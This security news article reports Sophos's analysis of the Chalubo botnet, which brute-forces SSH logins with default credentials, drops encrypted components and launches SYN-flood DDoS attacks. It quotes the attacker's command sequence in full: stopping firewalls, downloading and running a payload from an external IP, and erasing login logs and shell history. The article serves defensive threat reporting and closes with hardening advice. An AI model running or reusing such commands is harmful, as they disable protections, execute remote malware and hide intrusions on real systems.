Chalubo Botnet Compromise Your Server or IoT Device & Use it for DDOS Attack

Newly Discovered Chalubo Botnet that compromises the internet facing SSH servers on Linux-based systems, IOT Devices and uses it for Distributed denial-of-service attack.

Malware author using various evasion technique and more common windows malware principals to prevent from detection tools and also it adopted the anti analyzing technique to make it analyzing difficult.

Researchers believe that the Chalubo Botnet campaign started since August 2018 and it used 3 main components that have been retrieved for from victims device by executing the command from an attacker.

Downloader, the main bot, Lua command script, In this case, the main bot ran only on systems with an x86 processor architecture.

Here Attacker encrypts both the main bot component and its corresponding Lua script using the ChaCha stream cipher.

Also You can Take DDoS Protection Bootcamp – Free Training Course to Improve Your DDoS Protection Skills.

Chalubo Botnet Attack Process

Researchers from Sophos Initially discovered the Chalubo Botnet from their honeypot and identified that the bot attempting to brute force login credentials against an SSH server.

Honeypot was open to accepting various attack with a wide range of credentials based brute force attack and researchers have learned that the attackers using a combination of root:admin to gain a shell.

Later attackers issued the following command once the accessed the server where they are using a layered approach to dropping malicious components, but the encryption used isn’t one that we typically see with Linux malware.

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/
chmod 777 /usr/bin/libsdes
nohup /usr/bin/libsdes > /dev/null 2>&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c

Later the Downloader using one of the functions from Mirai Botnet and create an empty file to prevent multiple occurrences of the malware from executing and moving into the encryption process and drops the main bot.

After analyzing the main bot, researchers identified that Chalubo had copied a few code snippets from Mirai.

According to Sophos,” the bot’s Lua script communicates with the C2 server to receive further instructions. Its purpose is to download, decrypt, then execute whatever Lua script it finds.
The Lua retrieved by the bots we tested trigger the bot to perform a SYN flood attack against a single Chinese IP address over port 10100, without masking the local source IP. Interestingly it checks the /24 address of the local IP against 23.247.2.0, and if it is in that range, then it will set the source IP to one within the 183.131.206.0/24 range.”

This Bot mainly using the common username and password combinations against SSH servers.

An organization should always ensure and focus on maximum Protection level for enterprise networks and you can try a free trial to Stop DDoS Attack in 10 Seconds. Also, Check Your Company’s DDOS Attack Downtime Cost.

“Recommend that sysadmins of SSH servers (including embedded devices) change any default passwords on those devices, because the brute force attempts to cycle through common, publicly known default passwords. “

If possible, it’s preferable to use SSH keys instead of passwords for logins. As with any machine, make sure to keep the system updated!

Also Read:

Stop DDoS Attacks In 10 Seconds – Organization’s Most Important Consideration for DDOS Attack Mitigation

DDoS Attack Prevention Method on Your Enterprise’s Systems – A Detailed Report

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Threat Actors Leverage Email Bombing to Evade Security Tools and Conceal Malicious Activity

Threat actors are increasingly using email bombing to bypass security protocols and facilitate further malicious…

1 hour ago

Threat Actors Launch Active Attacks on Semiconductor Firms Using Zero-Day Exploits

Semiconductor companies, pivotal in the tech industry for their role in producing components integral to…

1 hour ago

Hackers Exploit Router Flaws in Ongoing Attacks on Enterprise Networks

Enterprises are facing heightened cyber threats as attackers increasingly target network infrastructure, particularly routers, following…

1 hour ago

Threat Actors Exploit Legitimate Crypto Packages to Deliver Malicious Code

Threat actors are using open-source software (OSS) repositories to install malicious code into trusted applications,…

1 hour ago

Tycoon 2FA Phishing Kit Uses Advanced Evasion Techniques to Bypass Endpoint Detection Systems

The notorious Tycoon 2FA phishing kit continues its evolution with new strategies designed to slip…

1 hour ago

Hands-On Labs: The Key to Accelerating CMMC 2.0 Compliance

INE Security Highlights How Practical, immersive training environments help defense contractors meet DoD cybersecurity requirements…

5 hours ago